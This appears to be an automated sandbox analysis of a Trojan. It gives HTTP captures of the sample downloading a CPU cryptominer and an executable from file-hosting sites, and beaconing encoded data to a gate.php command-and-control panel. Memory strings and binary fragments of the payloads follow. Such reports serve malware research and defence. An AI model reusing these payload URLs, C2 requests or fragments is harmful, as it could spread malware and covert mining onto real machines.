...U....VeriSign Trust Network1;09..U...2Terms of use at hXXps://VVV.v
erisign.com/rpa (c)09100...U...'VeriSign Class 3 Code Signing 2009-2 C
A..140510210002Z..140524210002Z0..h0!.....V..t..'.F(z....121202220203Z
0!.... .;...9.7.......090826054212Z0!...\.)../F..^p..s...100722072726Z
0!......P....A.x......100708154305Z0!.......O#.`n.5j.9...100930040708Z
0!..../..8~p...h......091006052837Z0!.....(../L....--aK..091029040207Z
0!...aW.....B.!.0..t..090909121104Z0!...g,..4(vv....mJ_..100514054218Z
0!.....V.....(..-..p..090826162211Z0!....O..,J.N.n...Ly..091028032204Z
0!....42r...I.Y@...3..100526162150Z0!.........}..Dt...!..090922192227Z
0!.......2l....7i..?..101109030426Z0!.....p%...l,AogP....100523060224Z
0!...,.P.C......*.....100303082219Z0!...NRPL.............100413090225Z
0!....1w....d.&..8....091026111702Z0!......F....e........090608081352Z
0!.....6..d6.7..4.....100924123027Z0!....$..*...s..&s....100219210742Z
0!......Q_.G..|.......091009145530Z0!........>..O...=72..1006161609
34Z0!....Xlm$|".su.......090619194406Z0!......J)..E......C..1009221422
43Z0!...D......u.y.Iy{k..101026130323Z0!...El...)>..W..<K...1010
04225456Z0!...p..wy.i.zc...X...091117001921Z0!.....,{..^..........0912
03194409Z0!....B....d...*.P.@..100705023431Z0!.......m. .V.....~..1011
11134216Z0!...2.R.i.{..........091029071123Z0!...`F..q2..O.:......1006
02074221Z0!...a{.-...@...'.....100723194022Z0!........fW.y.,s.....1010
11182226Z0!....Um..}.8)........100324085953Z0!....,u.boxr....Z....<<< skipped >>>
GET /CSC3-2009.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: csc3-2009-crl.verisign.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Server: Apache
ETag: "1bafe804fc42b27d2a70335cb2162128:1399755910"
Last-Modified: Sat, 10 May 2014 21:05:10 GMT
Accept-Ranges: bytes
Content-Length: 2249
Date: Sun, 11 May 2014 03:57:53 GMT
Connection: keep-alive
Content-Type: application/pkix-crl0...0......0...*.H........0..1.0...U....US1.0...U....VeriSign, Inc.1.0
...U....VeriSign Trust Network1;09..U...2Terms of use at hXXps://VVV.v
erisign.com/rpa (c)091.0,..U...%VeriSign Class 3 Code Signing 2009 CA.
.140510210003Z..140524210003Z0...0!.....zOR.D...,oMa...090525061903Z0!
......t.o=(..(..G...090520231844Z0!... ....M...m.Q.&...090517075442Z0!
...T.Ay(..U...:_|...090608072333Z0!... .(.....F..9.....090805090059Z0!
.......P..._}..;.x..090714150126Z0!.....5=.qOV[.cyg.&..090528172131Z0!
...K...=$.6.........090521015930Z0!...-H...D...tDXUN...090527062050Z0!
.......-.'@..<B{....090525110212Z0!......x..m*[.7.h#"..090702070220
Z0!.....%.o.....kT.....090527062152Z0!..!.*;....)..Ef..k..090529084018
Z0!..#.}h..."..........090527050204Z0!..$.I^./@.:7.p.,v...090521201736
Z0!..&.5{.....Q;D......090521184343Z0!..&...T[.~y.........090903081104
Z0!...q..m...G..i^.....090521025017Z0!../a.nS..[lA.lCB....090527045238
Z0!..0.....R..iX.px....090605052910Z0!..2.h..).n......p;..090713144756
Z0!..:.............. ..090605052934Z0!..;.0.*.v..*....P...090601001940
Z0!..?..}p 2I..o.\..u..090527061825Z0!..?....@.Z`......l..090527022214
Z0!..B..h~a..]..L.2....100512125735Z0!..B.U..ZF...........090527041620
Z0!..F'....?xxnx.6Q....090528003453Z0!..F|A..r....#.@.&...090527062259
Z0!..L.r....F..^..i.t..090608130549Z0!..Q...Y...Exm.._7...090520225737
Z0!..TH..~.. ..({......090723115618Z0!..U.59Z..[.G.RmyR1..090527071534
Z0!..V ].h.../".V<8-...090611075746Z0!..gHT...j5zdG....K..090521205
535Z0!..mje.......;.......090521012215Z0!..p^..E.{.>.........09<<< skipped >>>
GET /pca3-g2.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: crl.verisign.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Server: Apache
ETag: "072641a27cd10308fabc881f069f37c1:1396126208"
Last-Modified: Sat, 29 Mar 2014 20:50:08 GMT
Accept-Ranges: bytes
Content-Length: 1415
Date: Sun, 11 May 2014 03:57:53 GMT
Connection: keep-alive
Content-Type: application/pkix-crl0...0...0...*.H........0..1.0...U....US1.0...U....VeriSign, Inc.1<0
:..U...3Class 3 Public Primary Certification Authority - G21:08..U...1
(c) 1998 VeriSign, Inc. - For authorized use only1.0...U....VeriSign T
rust Network..140320000000Z..140630235959Z0...0!...=...X.FL...3..I..08
0403173458Z0!...SJs|.."E.G.......070412172616Z0!....E........W6.n...14
0129192923Z0!.......jvO..!....]..040401180422Z0!......\*....bO-.....08
0403173459Z0!....I..:.<....9..m..070412172523Z0!.........R.E!..=t..
.070522172634Z0!....}.....}.}.(q.C..040401180606Z0!...`.6..,...u.~x.:.
.080403173459Z0!.........wX.....~...080606171636Z0!..$.Jn>.t..d_j..
."..040401180518Z0!.. ..N*(.}H..j......070412172308Z0!.. ..3.J......d.
.9..070522172711Z0!..50.h.:....s.K"....040401180542Z0!..7_f...s.......
....080403173459Z0!..<.J..y..)..~x7.e..080606171735Z0!..NS.c.f.....
.7.p...070412172213Z0!..N.k;..-...9J..-...070522172748Z0!..Q..2pRv.WC.
:..f...030109181346Z0!..Tq..m..*..........140129192925Z0!..^..CX4.3...
F.R...070522172548Z0!..^..)..P3...7...L..080403173459Z0!..e........O.
^.S....080403173457Z0!..jP....Wv..[.v.5H..070412172102Z0!..nk.l.!y.~..
.7G@...070412171752Z0!..r.q.I-Ln./........080403173458Z0!..t8....D....
.......080606171524Z0!..t.xn.tS....O_.....070412171951Z0!..v......Qnw.
.W.g...140129192921Z0...*.H................V.!F.Y..p.V......s..%..*l.z
=...R./.F....q.......D.t......0b..?.R:9.(.|.....VBp8.......PZ...[o\p..
.U...........$).V.D....B@......<<< skipped >>>
GET /pca3-g5.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: crl.verisign.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Server: Apache
ETag: "895f8ccd92dfec674c94f0d04d1b63bc:1396128308"
Last-Modified: Sat, 29 Mar 2014 21:25:08 GMT
Accept-Ranges: bytes
Content-Length: 533
Date: Sun, 11 May 2014 03:57:54 GMT
Connection: keep-alive
Content-Type: application/pkix-crl0...0..0...*.H........0..1.0...U....US1.0...U....VeriSign, Inc.1.0...U
....VeriSign Trust Network1:08..U...1(c) 2006 VeriSign, Inc. - For aut
horized use only1E0C..U...<VeriSign Class 3 Public Primary Certific
ation Authority - G5..140320000000Z..140630235959Z0...*.H.............
}...a.D[..8..i.....g8..S..tt..a.e.B]..v.l9.m.....~.G(l...G..#z{...Za..
F.q....2^X..w.i'.&..n...4v8. &|/Y.B..%..J..g0."k.0....A..7.)h...=5....
'Z........y.Ye.......M.._5.9..B.*.. .4z@.7#...... UL.F......iDg..6...'
z$.E.E..*..g...2.@D.....&v...o..>..k1N...P...iHTTP/1.1 200 OK..Serv
er: Apache..ETag: "895f8ccd92dfec674c94f0d04d1b63bc:1396128308"..Last-
Modified: Sat, 29 Mar 2014 21:25:08 GMT..Accept-Ranges: bytes..Content
-Length: 533..Date: Sun, 11 May 2014 03:57:54 GMT..Connection: keep-al
ive..Content-Type: application/pkix-crl..0...0..0...*.H........0..1.0.
..U....US1.0...U....VeriSign, Inc.1.0...U....VeriSign Trust Network1:0
8..U...1(c) 2006 VeriSign, Inc. - For authorized use only1E0C..U...<
;VeriSign Class 3 Public Primary Certification Authority - G5..1403200
00000Z..140630235959Z0...*.H.............}...a.D[..8..i.....g8..S..tt.
.a.e.B]..v.l9.m.....~.G(l...G..#z{...Za..F.q....2^X..w.i'.&..n...4v8.
&|/Y.B..%..J..g0."k.0....A..7.)h...=5....'Z........y.Ye.......M.._5.9.
.B.*.. .4z@.7#...... UL.F......iDg..6...'z$.E.E..*..g...2.@D.....&v...
o..>..k1N...P...i..<<< skipped >>>
GET /gett/9a2RqWN1/CPUMiner.files?response-content-disposition=attachment;&AWSAccessKeyId=AKIAI7XHZJPL62V2UOVA&Signature=qD9RH/IX4s2iZULzsbyWAN3tBVs=&Expires=1399780798 HTTP/1.1
Host: s3.kkloud.com.s3.amazonaws.com
Connection: Keep-Alive
HTTP/1.1 200 OK
x-amz-id-2: TeHG2XT52p6a12Oy8ifa0G2eLQCSJvBJzOirYekEb9zoHGypEejtZoDD0ROgw8at
x-amz-request-id: 9009543A81F42AD2
Date: Sun, 11 May 2014 03:57:43 GMT
Content-Disposition: attachment;
Last-Modified: Sun, 02 Mar 2014 22:54:08 GMT
ETag: "bb1f7298813a025110816dbf3abf16c1-1"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Content-Length: 1511936
Server: AmazonS3......................................................................
........................S.R.E.S.U._.Y.E.K.H.........................0.
..E.N.I.H.C.A.M._.L.A.C.O.L._.Y.E.K.H.........................@...R.E.
S.U._.T.N.E.R.R.U.C._.Y.E.K.H.........................>...G.I.F.N.O
.C._.T.N.E.R.R.U.C._.Y.E.K.H.........................B...T.O.O.R._.S.E
.S.S.A.L.C._.Y.E.K.H.........................>.............2.3.m.e.
t.s.y.S.\.>.t.o.o.R.m.e.t.s.y.S.<.......2.3.m.e.t.s.y.S.......`.
..^...\...J.........................................................&g
t;.t.o.o.R.m.e.t.s.y.S.<.......>.t.o.o.R.m.e.t.s.y.S.<.......
h...f...d...J.........................................................
......................................................................
......................................................................
.....................................7.7.7.7.7.7.7.7.7.7.7.7h7d7`7\7X7
T7P7L7H7D7@7<7874707,7(7$7 7.7.7.7.7.7.7.7.6.6.6.6.6.6.6.6.6.6.6.6.
6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6|6x6t6p6l6h6d6`6\6X6T6P6L6H6D
6@6<6864606,6(6$6 6.6.6.6.6.6.5.5.5.5.5.5.5.5.5.5...........0.0.0.0
|0x0t0p0l0h0d0`0\0X0T0P0L0H0D0@0<0804000,0(0$0 0.0.0.0....H......5.
5.5.5.5.5.5.4.4.4.4.4.4.4.4.4.4.4.4.2p2l2h2d2`2\2X2T2P2L2H2D2@2<282
4202,2(2$2 2.2.2.2.2.2.2.2.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1
.1.1.1.1.1.1.1.1.1.1.1|1x1t1p1l1h1d1`1\1X1T1P1L1H1D1@1<1.1.0.0.0.0.
0.0.0.0.......p...0.040 0.0.0.0.......@.2.1.1.1.1.1.1.1.1.1r1b1R1B121"
1.1.0.0.0.0.0....4..0.=A<.<.<o737.7.6.6.6.6.6i6U6F616.5.5<<< skipped >>>
POST /wordpress/1/gate.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: popdown.me
Content-Length: 194
Expect: 100-continue
Connection: Keep-Alive
HTTP/1.1 100 Continue
....
crypt===gKtRWYqMDUYpieId0Mz4iMgAEIgATN1YTRgACIgASVQNEIvVHRgITKNRFKlJ3b
DBSKShCblRnbJpCIukUSgE0RWNFIlJXY31kVq4WatRWQqE0LOpiN4gHIQhFIzd3bk5WaXp
iM4IzN3QWY2QWMxkjZhZzNjNWNlFWZ4czN4UWYkRWM1ImYyMzYwEzM
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 11 May 2014 03:46:18 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.28208..=wXZ4VmLyYDNzYDIkF2bs52dvR2Pi9Gbi9CMvEzZPZnSjJmNvMXZslmZvEzLpBXYv
QHduU2Zv8iOwRHdoBCZh9Gbud3bk5CdvJGfqMXZ5ByZtACNzITMgAXLgUFUH5CZtFmYiNG
I11CIzMzMzoTbvNmLz5WavNWLl1WLlZXan5yY0x2LvoDcjR3KtVHdhJHdzBybtACdwlncj
NHIh1iKgQWYvxmb39GZ/I2bsJ2Lx8SMOdVcSJTY58yclxWam9SMvkGch9Cd05SZn9yL6AH
d0hGI0JXY0NnL1B3ZuIXZulWb8VGbiFmbl5iclxGbptGdvJGfqMFRBVkUIRFI01CI0MjMx
oTVQNkLk1WYiJ2Yg8ULgMzMzMjOt92YuMnbp92YtUWbtUmdpdmLjRHbv8iOwNGdr0Wd0Fm
c0NHIv1CI0BXeyN2cgEWLqACZh9Gbud3bk9jYvxmYvAzLx40VxJlMhlzLzVGbpZ2Lx8Saw
F2L0RnLld2LvoDc0RHagQnchR3cuIXZulWb..0..HTTP/1.1 200 OK..Server: nginx
..Date: Sun, 11 May 2014 03:46:18 GMT..Content-Type: text/html..Transf
er-Encoding: chunked..Connection: keep-alive..Vary: Accept-Encoding..X
-Powered-By: PHP/5.3.28..208..=wXZ4VmLyYDNzYDIkF2bs52dvR2Pi9Gbi9CMvEzZ
PZnSjJmNvMXZslmZvEzLpBXYvQHduU2Zv8iOwRHdoBCZh9Gbud3bk5CdvJGfqMXZ5ByZtA
CNzITMgAXLgUFUH5CZtFmYiNGI11CIzMzMzoTbvNmLz5WavNWLl1WLlZXan5yY0x2LvoDc
jR3KtVHdhJHdzBybtACdwlncjNHIh1iKgQWYvxmb39GZ/I2bsJ2Lx8SMOdVcSJTY58yclx
Wam9SMvkGch9Cd05SZn9yL6AHd0hGI0JXY0NnL1B3ZuIXZulWb8VGbiFmbl5iclxGbptGd
vJGfqMFRBVkUIRFI01CI0MjMxoTVQNkLk1WYiJ2Yg8ULgMzMzMjOt92YuMnbp92YtUWbtU
mdpdmLjRHbv8iOwNGdr0Wd0Fmc0NHIv1CI0BXeyN2cgEWLqACZh9Gbud3bk9jYvxmYvAzL
x40VxJlMhlzLzVGbpZ2Lx8SawF2L0RnLld2LvoDc0RHagQnchR3cuIXZulWb..0..
POST /wordpress/1/gate.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: popdown.me
Content-Length: 194
Expect: 100-continue
Connection: Keep-Alive
HTTP/1.1 100 Continue
....
crypt===gKtRWYqMDUYpieId0Mz4iMgAEIgATN1YTRgACIgASVQNEIvVHRgITKNRFKlJ3b
DBSKShCblRnbJpCIukUSgE0RWNFIlJXY31kVq4WatRWQqE0LOpiN4gHIQhFIzd3bk5WaXp
iM4IzN3QWY2QWMxkjZhZzNjNWNlFWZ4czN4UWYkRWM1ImYyMzYwEzM
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 11 May 2014 03:46:37 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.28208..=wXZ4VmLyYDNzYDIkF2bs52dvR2Pi9Gbi9CMvEzZPZnSjJmNvMXZslmZvEzLpBXYv
QHduU2Zv8iOwRHdoBCZh9Gbud3bk5CdvJGfqMXZ5ByZtACNzITMgAXLgUFUH5CZtFmYiNG
I11CIzMzMzoTbvNmLz5WavNWLl1WLlZXan5yY0x2LvoDcjR3KtVHdhJHdzBybtACdwlncj
NHIh1iKgQWYvxmb39GZ/I2bsJ2Lx8SMOdVcSJTY58yclxWam9SMvkGch9Cd05SZn9yL6AH
d0hGI0JXY0NnL1B3ZuIXZulWb8VGbiFmbl5iclxGbptGdvJGfqMFRBVkUIRFI01CI0MjMx
oTVQNkLk1WYiJ2Yg8ULgMzMzMjOt92YuMnbp92YtUWbtUmdpdmLjRHbv8iOwNGdr0Wd0Fm
c0NHIv1CI0BXeyN2cgEWLqACZh9Gbud3bk9jYvxmYvAzLx40VxJlMhlzLzVGbpZ2Lx8Saw
F2L0RnLld2LvoDc0RHagQnchR3cuIXZulWb..0..HTTP/1.1 200 OK..Server: nginx
..Date: Sun, 11 May 2014 03:46:37 GMT..Content-Type: text/html..Transf
er-Encoding: chunked..Connection: keep-alive..Vary: Accept-Encoding..X
-Powered-By: PHP/5.3.28..208..=wXZ4VmLyYDNzYDIkF2bs52dvR2Pi9Gbi9CMvEzZ
PZnSjJmNvMXZslmZvEzLpBXYvQHduU2Zv8iOwRHdoBCZh9Gbud3bk5CdvJGfqMXZ5ByZtA
CNzITMgAXLgUFUH5CZtFmYiNGI11CIzMzMzoTbvNmLz5WavNWLl1WLlZXan5yY0x2LvoDc
jR3KtVHdhJHdzBybtACdwlncjNHIh1iKgQWYvxmb39GZ/I2bsJ2Lx8SMOdVcSJTY58yclx
Wam9SMvkGch9Cd05SZn9yL6AHd0hGI0JXY0NnL1B3ZuIXZulWb8VGbiFmbl5iclxGbptGd
vJGfqMFRBVkUIRFI01CI0MjMxoTVQNkLk1WYiJ2Yg8ULgMzMzMjOt92YuMnbp92YtUWbtU
mdpdmLjRHbv8iOwNGdr0Wd0Fmc0NHIv1CI0BXeyN2cgEWLqACZh9Gbud3bk9jYvxmYvAzL
x40VxJlMhlzLzVGbpZ2Lx8SawF2L0RnLld2LvoDc0RHagQnchR3cuIXZulWb..0..
GET /streams/6bcJvOg1/63462.exe?sig=-UXpeL0WanQIYatmLOL4OmQyO4lMnb17DsM&type=download HTTP/1.1
Host: w013064.blob2.ge.tt
Connection: Keep-Alive
HTTP/1.1 200 OK
date: Sun, 11 May 2014 03:57:49 GMT
last-modified: Thu, 08 May 2014 12:19:32 GMT
etag: "6e7e17710d7ca996bf5647cba9efbcee-1"
accept-ranges: bytes
content-type: application/x-msdownload
content-length: 278528
server: gbs
access-control-allow-origin: *
content-disposition: attachment
Connection: keep-aliveMZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......PE..L....vkS
................................. ........@.. ........................
............@.................................\...O...................
................................................................. ....
........... ..H............text........ ...................... ..`.rsr
c...............................@..@.reloc...............>.........
.....@..B........................H....... ...<...........H!........
.......................................(....(....*.0.......... ....(..
..r...p(....o.........(....o....s.... ....(....r...p(....o....o....(..
...(....r-..po....... ..........i].a....X....i2......(.........(.... .
...(....rI..p(....o....(....t.....o......o.........*:~......o....&*...
(....*................lSystem.Resources.ResourceReader, mscorlib, Vers
ion=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.R
esources.RuntimeResourceSet............PADPADP"..N.........a.o.i.r.a.s
.........Czj7QiJMbypJOmgptLlia/ohTG8qTTpoaUtGYmtCIUxvKk06aClLRmJrQiFMb
ypNOmgpS0Zia0IhTG8qzTpoKUVZ2GVClUWiC/U7JORqEgoCMQE8HUUqSAlEayUDBSxOOE9
IKBoaXCVmCwViZQM8CiBVDExlS29hZiFMbypNOmh5DkZiJ0MiTGdcJmloKUtGYmtCIaxvK
EwxaSFLRpJrQiFsbypNOmgpZUBja0IBTG8qbTtoKUsGYmtiIUxvOk06bClLRmJrQiFIbyp
NOmgpS0YCakIhXG8qTTpoKUhGIu5CIVxvKl06aClLVmJrUiFMbypNOngpS0Zia0IhTG8qT
e5tKEsRYmtCIWxuKq0 aClLRmJrQiFMbypNOmgpS0ZiawIgTGMqTTpoKUtGYmtCIUxvKk0
6aClLRmJrQiFMbypNOmgpS0Zia0IhTG8qTTpoKUtGYmtCIUxvCk06YClLRmJrQiFMb<<< skipped >>>
GET /CSC3-2010.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: csc3-2010-crl.verisign.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Server: Apache
ETag: "6796efe0dffeb866d24738665300f835:1399756509"
Last-Modified: Sat, 10 May 2014 21:15:09 GMT
Accept-Ranges: bytes
Content-Length: 126066
Date: Sun, 11 May 2014 03:57:54 GMT
Connection: keep-alive
Content-Type: application/pkix-crl0...m0...T...0...*.H........0..1.0...U....US1.0...U....VeriSign, Inc.1
.0...U....VeriSign Trust Network1;09..U...2Terms of use at hXXps://www
.verisign.com/rpa (c)101.0,..U...%VeriSign Class 3 Code Signing 2010 C
A..140510210004Z..140524210004Z0...60!....c..k....D.k.....120708062201
Z0!... _...u.t.=.<.&...130218061114Z0!...&..].....P.k.:...120125130
117Z0!...7P.x....8.Q...s..130227010252Z0!...J.....Q..Y.[.....110404153
956Z0!...d...=..q!_...g9..130729145216Z0!...l.....h2<.H......120329
152211Z0!...q.9...`H.*.Y.C...120525202212Z0!...s...TM.......0...121221
080842Z0!...t..,.. ...eL.....130314222305Z0!...y..r.HW.v.....w..140423
054643Z0!..../u.......A..5...101214165045Z0!.....0.Xc...%...iM..121102
230226Z0!.......S.a&.X5t.E]..111206083350Z0!....c.(....B.[M83...140108
164517Z0!....A.Sv.....f,.....110609003155Z0!.....z......!.ID{]..101228
182208Z0!....b^......{d.J'...130102154110Z0!......0..........I..130912
181631Z0!....6e...~..T.......130131012247Z0!.........bD#*u......130226
223939Z0!.......@..'$.).;}\..130121172259Z0!....7.v..........n..120724
160733Z0!....P;.Y..d...c.(...120209181451Z0!.....].bb[.....!....140328
205453Z0!.....a...L`..IV.....130402103508Z0!......fFW.z.....@T..130117
000242Z0!...........].{7.....120730000000Z0!...".......Z.V.,.e..121031
192224Z0!...'....[.1......g..130318195659Z0!...,GI.jH.|...J.....120518
121623Z0!...<%a.=.d.......O..120424164254Z0!...@........... .a..121
109212441Z0!...L.&L..o.8..=6....110311141238Z0!...L...5...s $.=.=..130
205142241Z0!...O.c.........t....130109132228Z0!...X.BS.G]T.l.w.i..<<< skipped >>>
GET /1/files/6bcJvOg1/0/blob?download HTTP/1.1
Host: w269456.open.ge.tt
Connection: Keep-Alive
HTTP/1.1 307 Temporary Redirect
location: hXXp://w013064.blob2.ge.tt/streams/6bcJvOg1/63462.exe?sig=-UXpeL0WanQIYatmLOL4OmQyO4lMnb17DsM&type=download
connection: keep-alive
transfer-encoding: chunked0..HTTP/1.1 307 Temporary Redirect..location: hXXp://w013064.blob2.ge.
tt/streams/6bcJvOg1/63462.exe?sig=-UXpeL0WanQIYatmLOL4OmQyO4lMnb17DsM&
type=download..connection: keep-alive..transfer-encoding: chunked..0..
The Trojan connects to the servers at the folowing location(s):
.text
`.data
.rsrc
@.reloc
ADVAPI32.dll
KERNEL32.dll
NTDLL.DLL
USER32.dll
msvcrt.dll
OLEAUT32.dll
ole32.dll
VERSION.dll
wscript.exe
advapi32.dll
kernel32.dll
%s%s.DLL
wintrust.dll
%d.%d
Invalid parameter passed to C runtime function.
SOFTWARE\Classes\%s\%s
0x%8X
CreateURLMonikerEx
urlmon.dll
@@8X%u
RegCreateKeyA
RegCloseKey
RegOpenKeyA
RegDeleteKeyA
RegCreateKeyExW
RegCreateKeyExA
RegOpenKeyExW
ReportEventW
RegEnumKeyExA
RegOpenKeyExA
GetProcessHeap
GetCPInfo
MsgWaitForMultipleObjects
EnumThreadWindows
wscript.pdb
stdole2.tlbWWW
.ObjectWW
KeyW
WindowsFolderWWW4
%CopyFolderWWL
Windows Script Host (Ver 5.6)W)
Windows Script Host Application InterfaceW%
Windows Script Host Object
ebstrCmdLineW
78t8x8
5Q5F5
Software\Microsoft\Windows Script Host\Settings
Windows Script Host
WScript.CreateObject
WSHRemote.Execute
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}
.\%s.mui
.\%s\%s.mui
%s\%s.mui
%s\%s\%s.mui
%s\%s
Microsoft (R) Windows Based Script Host
5.7.0.16599
Microsoft (R) Windows Script Host
(Windows Script Host (debugging disabled)
Windows Script Host Error
Windows Script Host Input Error
This Unicode version of Windows Script Host will only execute under Windows NT.
Please use the ANSI version of Windows Script Host."
WScript execution time was exceeded on script "%1!ls!".
Script execution was terminated.1Could not locate automation class named "%1!ls!".
Could not connect object.'Could not create object named "%1!ls!".1Initialization of the Windows Script Host failed.6Can't find script engine "%2!ls!" for script "%1!ls!".!Can't change default script host.=An attempt at saving your settings via the //S option failed.(Loading script "%1!ls!" failed (%2!ls!).
Loading your settings failed.,Execution of the Windows Script Host failed.,Unexpected error of the Windows Script Host._Windows Script Host access is disabled on this machine. Contact your administrator for details. Missing job name.*Unicode is not supported on this platform. Command line options are saved.4The default script host is now set to "wscript.exe".4The default script host is now set to "cscript.exe".,Successful execution of Windows Script Host.3Successful remote execution of Windows Script Host.Win32 Error 0x%XWindows Script Host(Windows Script Host (debugging disabled)Usage: WScript scriptname.extension [option...] [arguments...]Use engine for executing scriptChanges the default script host to CScript.exeChanges the default script host to WScript.exe (default)Prevent logo display: No banner will be shown at execution time#WScript Error - Windows Script Host!Input Error - Windows Script HostlThis Unicode version of WScript will only execute under Windows NT.%6!ls! WScript - Script Execution Error!Windows Script Host Remote Script/Remote script object can only be executed once. Unable to execute remote script.%original file name%.exe_1180_rwx_00D10000_0000F000:
u.iD$.WfxP%original file name%.exe_1180_rwx_04AA0000_0000A000:
d.buh%original file name%.exe_1180_rwx_675A6000_00003000:
.Qg<-Qg*Rg`.Rg|)RgL RgWScript.exe_3524:
.text`.data.rsrc@.relocADVAPI32.dllKERNEL32.dllNTDLL.DLLUSER32.dllmsvcrt.dllOLEAUT32.dllole32.dllVERSION.dllwscript.exeadvapi32.dllkernel32.dll%s%s.DLLwintrust.dll%d.%dInvalid parameter passed to C runtime function.SOFTWARE\Classes\%s\%s0x%8XCreateURLMonikerExurlmon.dll@@8X%uRegCreateKeyARegCloseKeyRegOpenKeyARegDeleteKeyARegCreateKeyExWRegCreateKeyExARegOpenKeyExWReportEventWRegEnumKeyExARegOpenKeyExAGetProcessHeapGetCPInfoMsgWaitForMultipleObjectsEnumThreadWindowswscript.pdbstdole2.tlbWWW.ObjectWWKeyWWindowsFolderWWW4%CopyFolderWWLWindows Script Host (Ver 5.6)W)Windows Script Host Application InterfaceW%Windows Script Host ObjectebstrCmdLineW78t8x85Q5F5Software\Microsoft\Windows Script Host\SettingsWindows Script HostWScript.CreateObjectWSHRemote.ExecuteSoftware\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}.\%s.mui.\%s\%s.mui%s\%s.mui%s\%s\%s.mui%s\%sMicrosoft (R) Windows Based Script Host5.7.0.16599Microsoft (R) Windows Script Host(Windows Script Host (debugging disabled)Windows Script Host ErrorWindows Script Host Input ErrorThis Unicode version of Windows Script Host will only execute under Windows NT.Please use the ANSI version of Windows Script Host."WScript execution time was exceeded on script "%1!ls!".Script execution was terminated.1Could not locate automation class named "%1!ls!".Could not connect object.'Could not create object named "%1!ls!".1Initialization of the Windows Script Host failed.6Can't find script engine "%2!ls!" for script "%1!ls!".!Can't change default script host.=An attempt at saving your settings via the //S option failed.(Loading script "%1!ls!" failed (%2!ls!).Loading your settings failed.,Execution of the Windows Script Host failed.,Unexpected error of the Windows Script Host._Windows Script Host access is disabled on this machine. Contact your administrator for details. Missing job name.*Unicode is not supported on this platform. Command line options are saved.4The default script host is now set to "wscript.exe".4The default script host is now set to "cscript.exe".,Successful execution of Windows Script Host.3Successful remote execution of Windows Script Host.Win32 Error 0x%XWindows Script Host(Windows Script Host (debugging disabled)Usage: WScript scriptname.extension [option...] [arguments...]Use engine for executing scriptChanges the default script host to CScript.exeChanges the default script host to WScript.exe (default)Prevent logo display: No banner will be shown at execution time#WScript Error - Windows Script Host!Input Error - Windows Script HostlThis Unicode version of WScript will only execute under Windows NT.%6!ls! WScript - Script Execution Error!Windows Script Host Remote Script/Remote script object can only be executed once. Unable to execute remote script.nt32.exe_1324_rwx_00D20000_00010000:
u.iD$.WexPnt32.exe_1324_rwx_675A6000_00003000:
.Qg<-Qg*Rg`.Rg|)RgL Rgcvtres.exe_3500:
.text``.data.rdata`@.bss.idata.main.bxpck66665\\\\\\\\5\\\\666656666libgcj-12.dllJSON decode of %s failedhttp://https://stratum tcp://http://%scpuminer 2.3.2accepted: %lu/%lu (%.2f%%), %s khash/s %sDEBUG: reject reason: %sDEBUG: job_id='%s' extranonce2=%s ntime=xStarting Stratum on %s...terminating workio thread...retry after %d secondsJSON decode failed(%d): %s{"method": "mining.submit", "params": ["%s", "%s", "%s", "%s", "%s"], "id":4}{"method": "getwork", "params": [ "%s" ], "id":1}JSON key '%s' not foundJSON key '%s' is not a stringCURL initialization failed%s%s%sLong-polling activated for %sjson_rpc_call failed, retry after %d secondsDEBUG: got new work in %d msBinding thread %d to cpu %dthread %d: %lu hashes, %s khash/sTotal: %s khash/swork retrieval failed, exiting mining thread %dhttp://127.0.0.1:9332/%s: unsupported non-option argument '%s'JSON option %s invalidhttps:%s:%sthread %d create failed%d miner threads started, using '%s' algorithm.certuserpass-o, --url=URL URL of mining server (default: http://127.0.0.1:9332/)-O, --userpass=U:P username:password pair for mining server-p, --pass=PASSWORD password for mining server--cert=FILE certificate for mining server using SSL-x, --proxy=[PROTOCOL://]HOST[:PORT] connect through a proxy--no-longpoll disable X-Long-Polling support--no-stratum disable X-Stratum support[%d-d-d d:d:d] %sUser-Agent: cpuminer/2.3.2HTTP request failed: %sJSON-RPC call failed: %shex2bin failed on '%s'DEBUG: %sHash: %sTarget: %shttp%shttp_proxyStratum connection failed: %s{"id": 1, "method": "mining.subscribe", "params": []}{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.3.2", "%s"]}{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.3.2"]}mining.notifyStratum session id: %smining.set_difficultyclient.reconnectstratum tcp://%s:%dServer requested reconnection to %sclient.get_versioncpuminer/2.3.2client.show_messageMESSAGE FROM SERVER: %s{"id": 2, "method": "mining.authorize", "params": ["%s", "%s"]}%s near '%s'%s near end of fileunable to decode byte 0x%x at position %dcontrol character 0x%xinvalid Unicode '\uX\uX'invalid Unicode '\uX'end == saved_text lex->saved_text.lengthunable to open %s: %s\ux\ux\uxmingwm10.dll__mingwthr_remove_key_dtor__mingwthr_key_dtorVirtualQuery failed for %d bytes at address %pUnknown 